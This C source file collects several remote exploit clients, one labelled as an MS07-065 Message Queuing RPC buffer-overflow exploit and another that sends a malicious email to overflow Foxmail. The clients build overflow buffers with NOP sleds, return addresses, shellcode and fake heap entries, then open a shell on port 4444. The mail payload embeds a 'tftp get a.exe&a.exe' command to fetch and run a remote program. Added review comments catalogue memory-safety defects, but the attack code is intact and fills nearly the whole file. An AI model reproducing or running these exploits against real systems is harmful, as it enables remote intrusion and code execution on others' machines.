/*
 * Entry point of a proof-of-concept network client (POSIX flavour: the socket
 * is a plain int and the delay uses sleep()).  It fills a 1024-byte buffer from
 * sh_Buff/sh_Len and RET, sends it to argv[1]:argv[2], follows it with a single
 * byte sent with flags == 1, and then hands the connected socket to shell().
 *
 * Names that come from elsewhere in the file: Make_Connection(), GetShellcode(),
 * sh_Buff, sh_Len, RET and shell().  Their contracts are not visible here.
 *
 * Review notes -- memory-safety defects visible in this block, left as-is:
 *  - both fill loops step an unsigned long pointer and assume a 4-byte word;
 *    on an LP64 build the first loop writes 2048 bytes into the 1024-byte array;
 *  - Buff[sizeof(Buff)] = 0 stores one element past the end of Buff (UB);
 *  - sh_Len is never compared with sizeof(Buff) before the memcpy, so a large
 *    sh_Len turns the destination into a negative offset from Buff;
 *  - "if (!s)" treats 0 as the only failure value, while the other main()
 *    functions in this file test "s < 0" -- confirm which matches
 *    Make_Connection()'s real failure return.
 * Returns -1 on argument, connect or send failure; otherwise falls off the end
 * of main() (implicit return 0 in C99 and later).
 */
int main(int argc, char *argv[]) {
    unsigned char Buff[1024];
    unsigned char data;
    unsigned long *ps;
    int s, i, k;                       /* k is declared but never used */

    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
        return -1;
    }
    /* atoi() does no validation: a non-numeric port silently becomes 0 */
    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    if (!s) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }
    GetShellcode();                    /* presumably fills sh_Buff / sh_Len -- not visible here */

    /* Fill the whole buffer one word at a time.  i is int and sizeof(Buff)/4
     * is size_t (signed/unsigned comparison); see the LP64 note above. */
    ps = (unsigned long *)Buff;
    for(i=0; i<sizeof(Buff)/4; i++) {
        *(ps++) = 0x60000000;
    }
    i = sh_Len % 4;                    /* dead store: i is reassigned by the next loop */
    /* Place sh_Buff at the tail of Buff; no check that sh_Len <= sizeof(Buff). */
    memcpy(&Buff[sizeof(Buff) - sh_Len], sh_Buff, sh_Len);
    /* Overwrite the first 92 bytes with RET, 4 bytes per iteration (8 on LP64). */
    ps = (unsigned long *)Buff;
    for(i=0; i<92/4; i++) {
        *(ps++) = RET;
    }
    Buff[sizeof(Buff)] = 0;            /* out-of-bounds write: the last valid index is sizeof(Buff)-1 */
    //PrintSc(Buff, sizeof(Buff));
    i = send(s, Buff, sizeof(Buff), 0);
    if (i <= 0) {
        fprintf(stderr, "[-] Send failed. \n");
        return -1;
    }
    /* One byte with flags == 1; the error text calls it OOB data (MSG_OOB is 1
     * on the common platforms) -- the named constant would make that explicit. */
    data='I';
    i = send(s, &data, 1, 1);
    if (i <= 0) {
        fprintf(stderr, "[-] Send OOB data failed. \n");
        return -1;
    }
    sleep (1);
    shell(s);                          /* defined elsewhere in the file */
}
/*
 * Entry point of the Windows (Winsock) variant of the test client.  It
 * connects to the fixed loopback address 127.0.0.1:4444 -- so this build can
 * only talk to a listener on the same host -- appends the local port of that
 * connection to sh_Buff, builds a 1024-byte buffer around JUMPESP and sh_Buff,
 * sends it, waits one second and hands the socket to shell().
 *
 * Names from elsewhere in the file: Make_Connection(), GetShellCode(), sh_Buff,
 * sh_Len, Enc_key (a global this function also modifies), JUMPESP, shell().
 *
 * Review notes, left as-is:
 *  - memset() covers sizeof(Buff)-1 bytes and nothing else writes Buff[1023],
 *    so send() transmits one uninitialised stack byte;
 *  - strcpy(Buff+60, sh_Buff) is unbounded: nothing compares sh_Len with
 *    sizeof(Buff) - 60, and the memcpy / sh_Buff[sh_Len+2] store assume three
 *    spare bytes at the end of sh_Buff;
 *  - getsockname() and send() return values are not checked;
 *  - SOCKET is an unsigned type on Winsock, so "s<0" can only be true if
 *    Make_Connection() returns a signed int -- verify its declaration;
 *  - port is computed and printed but the commented-out memcpy shows the
 *    XOR-encoded value was abandoned in favour of the raw sin_port;
 *  - main() returns 1 on the success path, which a shell reads as failure.
 */
int main() {
    SOCKET c,s;                        /* c is never used */
    WSADATA WSAData;
    char Buff[1024];
    unsigned short port;
    struct sockaddr_in sa;
    int salen = sizeof(sa);

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    GetShellCode();                    /* presumably fills sh_Buff / sh_Len */
    if (!sh_Len) {
        printf("[-] Shellcode generate error.\n");
        exit(1);
    }
    s = Make_Connection("127.0.0.1", 4444, 10);
    if(s<0) {
        printf("[-] connect error.\n");
        exit(1);
    }
    // get local port
    getsockname(s, (struct sockaddr FAR *)&sa, &salen);   /* unchecked: sa is stale if this fails */
    Enc_key += Enc_key << 8;           /* presumably replicates a one-byte key into the high byte; mutates the global */
    port = sa.sin_port^Enc_key;        /* XOR-encoded port: only printed, not used below */
    printf("port = %x %x\n", sa.sin_port, port);
    //memcpy(&sh_Buff[sh_Len], &port, 2);
    memcpy(&sh_Buff[sh_Len], &sa.sin_port, 2);   /* raw network-byte-order port, no bounds check on sh_Buff */
    sh_Buff[sh_Len+2] = 0;
    memset(Buff, 0x90, sizeof(Buff)-1);          /* leaves Buff[1023] uninitialised */
    strcpy(Buff+56, JUMPESP);                    /* unbounded copies, see notes above */
    strcpy(Buff+60, sh_Buff);
    send(s,Buff,sizeof(Buff),0);                 /* return value unchecked */
    Sleep(1000);
    shell(s);
    WSACleanup();
    return 1;
}
/*
 * Entry point of a Windows (Winsock) client that connects to argv[1]:argv[2],
 * sends a 1024-byte buffer built from 0x90 fill, JUMPESP at offset 56 and the
 * file-level shellcode string at offset 60, waits one second, then opens a
 * second connection to port 4444 on the same host and hands it to shell().
 *
 * Names from elsewhere in the file: Make_Connection(), JUMPESP, shellcode, shell().
 *
 * Review notes, left as-is:
 *  - memset() stops one byte short, so Buff[1023] is sent uninitialised;
 *  - both strcpy() calls are unbounded; the length of shellcode is never
 *    compared with sizeof(Buff) - 60;
 *  - send() and the second Make_Connection() are not checked before use,
 *    so c is passed to shell() even when it holds the failure value;
 *  - s is never closed; the usage line lacks a trailing newline;
 *  - SOCKET is unsigned on Winsock, so "s<0" depends on Make_Connection()
 *    returning a signed int -- verify;
 *  - main() returns 1 on the success path.
 */
int main(int argc, char *argv[]) {
    SOCKET c,s;
    WSADATA WSAData;
    char Buff[1024];

    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]);   /* no trailing newline */
        exit(1);
    }
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    memset(Buff, 0x90, sizeof(Buff)-1);        /* Buff[1023] stays uninitialised */
    strcpy(Buff+56, JUMPESP);                  /* unbounded; JUMPESP and shellcode are file-level */
    strcpy(Buff+60, shellcode);
    s = Make_Connection(argv[1], atoi(argv[2]), 10);   /* atoi(): no validation of the port text */
    if(s<0) {
        printf("[-] connect err.\n");
        exit(1);
    }
    send(s,Buff,sizeof(Buff),0);               /* return value unchecked */
    Sleep(1000);
    c = Make_Connection(argv[1], 4444, 10);    /* not checked before use, unlike s above */
    shell(c);
    WSACleanup();
    return 1;
}
/*
 * POSIX variant of the client in this file that places sh_Buff at the end of
 * the buffer instead of at a fixed offset: Buff is 0x90-filled, sh_Buff is
 * strcpy'd so that its terminator lands on Buff[1023], the first 128 bytes are
 * overwritten with RET, the buffer is sent, one byte with flags == 1 follows,
 * and the same socket is handed to shell().
 *
 * Names from elsewhere in the file: Make_Connection(), GetShellcode(), PrintSc(),
 * sh_Buff, sh_Len, RET, shell().
 *
 * Review notes, left as-is:
 *  - the strcpy() destination is Buff + (sizeof(Buff) - sh_Len - 1) in size_t
 *    arithmetic; with no check that sh_Len <= 1023 a larger value wraps to a
 *    pointer far outside Buff.  strcpy() also copies strlen(sh_Buff)+1 bytes,
 *    which only fits if sh_Buff is exactly sh_Len bytes with no embedded NUL;
 *  - the RET loop steps an unsigned long pointer: 128 bytes on ILP32 but 256
 *    on LP64;
 *  - "if (!s)" vs "s < 0" -- same inconsistency as the sibling main() above;
 *  - main() falls off the end (implicit 0 in C99 and later).
 */
int main(int argc, char *argv[]) {
    unsigned char Buff[1024];
    unsigned char data;
    unsigned long *ps;
    int s, i;

    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
        return -1;
    }
    s = Make_Connection(argv[1], atoi(argv[2]), 10);   /* atoi(): no validation of the port text */
    if (!s) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }
    GetShellcode();                    /* presumably fills sh_Buff / sh_Len */
    PrintSc(sh_Buff, sh_Len);          /* hex dump helper defined elsewhere, presumably */
    memset(Buff, 0x90, sizeof(Buff));
    /* Tail placement: the terminating NUL of sh_Buff lands on Buff[1023]. */
    strcpy(Buff + (sizeof(Buff) - sh_Len - 1), sh_Buff);
    /* Overwrite the first 128 bytes with RET (see the LP64 note above). */
    ps = (unsigned long *)Buff;
    for(i=0; i<128/4; i++) {
        *(ps++) = RET;
    }
    Buff[sizeof(Buff) - 1] = 0;
    i = send(s, Buff, sizeof(Buff), 0);
    if (i <= 0) {
        fprintf(stderr, "[-] Send failed. \n");
        return -1;
    }
    /* One byte with flags == 1; the error text calls it OOB data (MSG_OOB is 1
     * on the common platforms) -- the named constant would make that explicit. */
    data='I';
    i = send(s, &data, 1, 1);
    if (i <= 0) {
        fprintf(stderr, "[-] Send OOB data failed. \n");
        return -1;
    }
    sleep (1);
    // get shell use same socket
    shell(s);
}
/*
 * Entry point of an RPC-over-TCP test client: parses -h host, -p port and
 * -n name, widens name to two bytes per character (UTF-16LE-style, without a
 * terminator), assembles request_1 from request_1a + widened name + request_1c,
 * and would then send bind_str, request_1, a 5104-byte filler and request_2 to
 * the target.  The unconditional exit(1) right after the assembly means that
 * nothing past it ever runs -- presumably a deliberate kill-switch left in this
 * "MK mod" build -- so as written the program only parses its arguments,
 * prints the banner, connects and exits.
 *
 * Names from elsewhere in the file: usage(), Make_Connection(), Disconnect(),
 * bind_str, request_1a, request_1b, request_1c, request_1, request_2.
 *
 * Review notes, left as-is:
 *  - every option reads argv[i + 1] without checking i + 1 < argc, so an
 *    option given as the last argument dereferences argv[argc], which is NULL;
 *  - usage() is assumed not to return; if it does, target/name stay NULL and
 *    strlen(name) below is UB.  name is unsigned char * but is passed to
 *    strlen()/strcpy(), which expect char * (diagnostic, not an error);
 *  - request_1b is malloc'd as 2*strlen(name) bytes and then strcpy() writes
 *    strlen(name)+1 bytes into it: a one-byte overflow when name is empty and a
 *    pointless copy otherwise, since the loop below rewrites every byte;
 *  - strlen(name) is re-evaluated on every loop iteration;
 *  - send(s, request_1, sizeof(request_1), 0) sends sizeof a pointer, not len;
 *  - ret from recv() is never examined; request_1 and request_1b are never
 *    freed (moot because of the exit);
 *  - len2 is declared and never used.
 * Returns 0 (unreachable) or exits with status 1 on any error.
 */
int main (int argc, char *argv[]) {
    unsigned char *target = NULL;
    unsigned char *name = NULL;
    int port = 2103;
    int i, j, len, len2;               /* len2 is never used */
    int ret;
    char buffer[6000] = { 0 };
    SOCKET s;
    WSADATA WSAData;

    printf("--------------------------------------------------------------------------\n");
    printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
    printf("-== code by axis@ph4nt0m ==-\n");
    printf("-== Http://www.ph4nt0m.org ==-\n");
    printf("-== Tested against Windows 2000 server SP4 ==-\n");
    printf ("--------------------------------------------------------------------------\n\n");
    if (argc < 5)
        usage (argv[0]);               /* assumed not to return */
    //Handle parameters
    for (i = 1; i < argc; i++) {
        if ((argv[i][0] == '-')) {
            /* argv[i + 1] is read without checking that i + 1 < argc */
            switch (argv[i][1]) {
                case 'h':
                    target = (unsigned char *) argv[i + 1];
                    break;
                case 'p':
                    if (strcmp (argv[i + 1], "2103") == 0) {
                        printf ("[+] Attacking default port 2103\n");
                    } else {
                        port = atoi (argv[i + 1]);   /* no validation of the port text */
                    }
                    break;
                case 'n':
                    name = (unsigned char *) argv[i + 1];
                    break;
                default:
                    printf ("[-] Invalid argument: %s\n", argv[i]);
                    usage (argv[0]);
                    break;
            }
            i++;                       /* skip the option's value */
        } else
            usage (argv[0]);
    }
    /* Widen name to two bytes per character: 2*strlen(name) bytes, no terminator. */
    request_1b = malloc (sizeof (char) * (strlen (name) * 2));
    if (request_1b == NULL) {
        printf ("Allocation Error\n");
        exit (1);
    }
    strcpy (request_1b, name);         /* redundant (and one byte too long when name is empty) */
    for (i = 0, j = 0; j < (strlen (name) * 2); j++) {
        if (!(j % 2)) {
            *(request_1b + j) = *(name + i);
        } else {
            *(request_1b + j) = '\x00';
            i++;
        }
    }
    /********************** attack payload ***************************/
    if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0) {
        fprintf (stderr, "[-] WSAStartup failed.\n");
        WSACleanup ();
        exit (1);
    }
    Sleep (1200);
    s = Make_Connection ((char *) target, port, 10);
    if (s < 0) {                       /* only meaningful if Make_Connection() returns a signed int */
        fprintf (stderr, "[-] connect err.\n");
        exit (1);
    }
    //Send our evil Payload
    printf ("[*]Sending our Payload, Good Luck! ^_^\n");
    printf ("[*]Sending RPC Bind String!\n");
    send (s, bind_str, sizeof (bind_str), 0);   /* return value unchecked */
    Sleep (1000);
    printf ("[*]Sending RPC Request Now!\n");
    /* request_1 = 56-byte header + widened name + 640-byte trailer */
    len = 56 + (strlen (name) * 2) + 640;
    request_1 = calloc (len, sizeof (char));
    if (request_1 == NULL) {
        printf ("Allocation Error\n");
        exit (1);
    }
    memcpy (request_1, request_1a, 56);
    memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
    memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);
    exit(1);                           /* everything below is unreachable; see header note */
    memset (buffer, '\x41', sizeof (buffer)); // fill the buffer to trigger seh
    send (s, request_1, sizeof (request_1), 0);   /* sizeof a pointer, not len */
    send (s, buffer, 5104, 0); // fill the buffer to trigger seh
    send (s, request_2, sizeof (request_2), 0);
    Sleep (100);
    memset (buffer, 0, sizeof (buffer));
    ret = recv (s, buffer, sizeof (buffer) - 1, 0);   /* ret is never examined */
    //printf("recv: %s\n", buffer);
    Disconnect (s);
    return 0;
}
/*
 * Entry point of a Windows (Winsock) client that builds an 0x2000-byte buffer:
 * sh_Buff at the start, 'A' fill, and three HEAP_FREE_ENTRY-shaped records
 * written at Buff[OFFSET], Buff[OFFSET-64] and Buff[OFFSET-32] with fixed field
 * values and pointers taken from file-level constants.  After sending it the
 * program waits one second, connects to bindport on the same host and hands
 * that socket to shell().
 *
 * Names from elsewhere in the file: Make_Connection(), GetShellCode(), sh_Buff,
 * sh_Len, Enc_key (modified here), OFFSET, PHEAP_FREE_ENTRY / HEAP_FREE_ENTRY,
 * LIST_ENTRY, HEAP_ENTRY_SETTABLE_FLAG2, HEAP_ENTRY_BUSY, FastPebLockRoutine,
 * WriteSpace, shell().
 *
 * Review notes, left as-is:
 *  - memcpy(&sh_Buff[sh_Len-4], ...) requires sh_Len >= 4 but only
 *    sh_Len != 0 is checked; memcpy(Buff, sh_Buff, sh_Len) has no
 *    sh_Len <= sizeof(Buff) check;
 *  - the three struct casts assume OFFSET >= 64 and
 *    OFFSET + sizeof(HEAP_FREE_ENTRY) <= 0x2000 -- OFFSET is not visible
 *    here, verify at its definition;
 *  - those casts access a char array through a struct pointer (alignment and
 *    strict-aliasing concerns; benign on x86 in practice);
 *  - i receives send()'s result but it is never examined; the second
 *    Make_Connection() is tested with "c<0" on an unsigned SOCKET type --
 *    verify Make_Connection()'s return type;
 *  - data, port, sa, salen, l, j and k are declared and never used;
 *  - bindport comes from atoi() with no validation; the usage string lacks a
 *    newline; main() returns 1 on the success path.
 */
int main(int argc, char *argv[]) {
    unsigned char Buff[0x2000];
    unsigned char data;                /* unused */
    unsigned short bindport;
    SOCKET c,s;
    WSADATA WSAData;
    unsigned short port;               /* unused */
    struct sockaddr_in sa;             /* unused */
    int salen = sizeof(sa);            /* unused */
    int l,i,j,k;                       /* only i is used */
    PHEAP_FREE_ENTRY pFakeEntry1;
    PHEAP_FREE_ENTRY pFakeEntry2;
    PHEAP_FREE_ENTRY pFakeEntry3;

    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_addr remote_port bind_port", argv[0]);
        exit(1);
    }
    if (argc > 3) {
        bindport = atoi(argv[3]);
    } else {
        bindport = 4444;
    }
    GetShellCode();                    /* presumably fills sh_Buff / sh_Len */
    if (sh_Len == 0) {
        fprintf(stderr, "Generate shellcode failed!\n");
        exit(1);
    }
    /* Store the XOR-encoded port four bytes before the end of sh_Buff, then
     * restore bindport for the connect below.  Requires sh_Len >= 4. */
    Enc_key += Enc_key << 8;           /* presumably replicates a one-byte key into the high byte; mutates the global */
    bindport ^= Enc_key;
    memcpy(&sh_Buff[sh_Len-4], &bindport, 2);
    bindport ^= Enc_key;
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    if(s<0) {
        printf("[-] connect err.\n");
        exit(1);
    }
    // Construct Buff
    memset(Buff, 'A', sizeof(Buff));
    memcpy(Buff, sh_Buff, sh_Len);     /* no sh_Len <= sizeof(Buff) check */
    // buf2
    pFakeEntry1 = (PHEAP_FREE_ENTRY)&Buff[OFFSET];
    pFakeEntry1->PreviousSize = 0x8;
    pFakeEntry1->Size = 0x2;
    pFakeEntry1->SegmentIndex = 0x31;
    pFakeEntry1->Flags = HEAP_ENTRY_SETTABLE_FLAG2 | HEAP_ENTRY_BUSY;
    pFakeEntry1->Index = 0x0;
    pFakeEntry1->Mask = 0x0;
    // fakechunk1
    pFakeEntry2 = (PHEAP_FREE_ENTRY)&Buff[OFFSET-64];
    pFakeEntry2->PreviousSize = 0x2;
    pFakeEntry2->Size = 0x2;
    pFakeEntry2->SegmentIndex = 0x31;
    pFakeEntry2->Flags = HEAP_ENTRY_SETTABLE_FLAG2;
    pFakeEntry2->Index = 0x1;
    pFakeEntry2->Mask = 0x1;
    pFakeEntry2->FreeList.Flink = (LIST_ENTRY*)FastPebLockRoutine;
    pFakeEntry2->FreeList.Blink = (LIST_ENTRY*)WriteSpace;
    // fakechunk2
    pFakeEntry3 = (PHEAP_FREE_ENTRY)&Buff[OFFSET-32];
    pFakeEntry3->PreviousSize = 0x2;
    pFakeEntry3->Size = 0x2;
    pFakeEntry3->SegmentIndex = 0x31;
    pFakeEntry3->Flags = HEAP_ENTRY_SETTABLE_FLAG2;
    pFakeEntry3->Index = 0x1;
    pFakeEntry3->Mask = 0x1;
    pFakeEntry3->FreeList.Flink = (LIST_ENTRY*)0x902BD0C2; // RETN 2BD0
    pFakeEntry3->FreeList.Blink = (LIST_ENTRY*)WriteSpace;
    i = send(s,Buff,sizeof(Buff),0);   /* i is never examined */
    Sleep(1000);
    c = Make_Connection(argv[1], bindport, 10);
    if(c<0) {
        printf("[-] connect err.\n");
        exit(1);
    }
    shell(c);
    WSACleanup();
    return 1;
}
/*
 * SendXMail -- drives a minimal SMTP dialogue (HELO, MAIL FROM, RCPT TO, DATA)
 * with smtpserver on SMTPPORT and submits one message whose body is produced
 * from the file-level template `packet` and a 510-byte block that mixes 'A'
 * fill, the caller's shellcode string, a "cmd /c tftp -i <tftp> get
 * a.exe&a.exe:" command line and four fixed 32-bit values at offsets
 * 0x100..0x110.
 *
 * Parameters:
 *   mailaddr    recipient, inserted verbatim into the RCPT TO line
 *   tftp        host substituted into the tftp command line
 *   smtpserver  SMTP relay to connect to
 *   shellcode   byte string prepended to the command line; it becomes part of
 *               a printf-style format, so it must not contain '%'
 * Returns 0 after the final server reply; every socket error calls exit(1)
 * instead of returning, so callers never see a failure code.
 *
 * Names from elsewhere in the file: Make_Connection(), SMTPPORT, packet.
 *
 * Review notes -- this function is itself attackable by the SMTP server it
 * talks to (left as-is):
 *  - printf(buf) passes server-controlled text as the format string
 *    (CERT FIO30-C); printf("%s", buf) or fputs(buf, stdout) is what is meant;
 *  - every recv() asks for 4096 bytes into the 510-byte buf -- a stack buffer
 *    overflow on any reply longer than 509 bytes;
 *  - sprintf/strcpy/strcat into tmp[500] and sprintf into tmp1[500] are
 *    unbounded, and when strlen(tmp1) > 0x100 the memcpy destination
 *    buf+0x100-strlen(tmp1) points before the array;
 *  - the 32-bit stores through (int *) alias a char array (alignment and
 *    strict-aliasing; tolerated on x86, UB in the abstract machine);
 *  - sprintf(sbuf, packet, buf) relies on packet holding exactly one %s and
 *    on the 0x10000-byte sbuf being large enough; send(..., strlen(sbuf), ...)
 *    stops at the first NUL, so the message body must be NUL-free;
 *  - the MAIL FROM literal looks like a redaction placeholder from the page
 *    this listing was taken from -- confirm against the original source;
 *  - i is never used; csock is only closed on the success path.
 */
int SendXMail( char *mailaddr, char *tftp, char *smtpserver, char *shellcode) {
    SOCKET csock;
    int ret,i=0;                       /* i is never used */
    char buf[510], sbuf[0x10000], tmp[500], tmp1[500];

    csock = Make_Connection(smtpserver, SMTPPORT, 10);
    if(csock<0) {                      /* only meaningful if Make_Connection() returns a signed int */
        printf("connect err.\n");
        exit(1);
    }
    /* Greeting banner: recv() length exceeds sizeof(buf); see header notes. */
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0) {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);                       /* format-string defect: server text used as format */
    ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0);
    if(ret<=0) {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0) {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    ret=send(csock, "MAIL FROM: [email protected]\r\n",strlen("MAIL FROM: [email protected]\r\n"), 0);
    if(ret<=0) {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0) {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    sprintf(tmp, "RCPT TO: %s\r\n", mailaddr);   /* unbounded: mailaddr length not checked */
    ret=send(csock, tmp,strlen(tmp), 0);
    if(ret<=0) {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0) {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    Sleep(1000);
    ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0);
    if(ret<=0) {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0) {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    printf("send exploit mail...\n");
    /* Build the 510-byte block: 'A' fill with a NUL terminator at buf[509]. */
    memset(sbuf, 0, sizeof(sbuf));
    memset(buf, 0, sizeof(buf));       /* only buf[509] survives the next memset */
    memset(buf, 0x41, sizeof(buf)-1);
    memset(tmp, 0, sizeof(tmp));
    //strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
    strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");   /* tmp now doubles as a format string */
    sprintf(tmp1, tmp, tftp);          /* breaks if shellcode contains '%' */
    /* Right-align tmp1 so that it ends at buf[0x100]; underflows if longer. */
    memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
    *(int *)(buf+0x100)=0x7ffa54cd; //ret addr jmp esp
    *(int *)(buf+0x104)=0x80eb80eb; //jmp back
    *(int *)(buf+0x108)=0x7ffdf220; //writeable addr
    *(int *)(buf+0x110)=0x7ffdf220; //writeable addr
    memcpy(buf, "girl\x0d", 5);       /* 5 bytes, no terminator */
    sprintf(sbuf, (char *)packet, buf);   /* packet is file-level; assumed to hold one %s */
    ret=send(csock, sbuf,strlen(sbuf), 0);
    if(ret<=0) {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0) {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    printf("exploit mail sent.\n");
    closesocket(csock);
    return 0;
}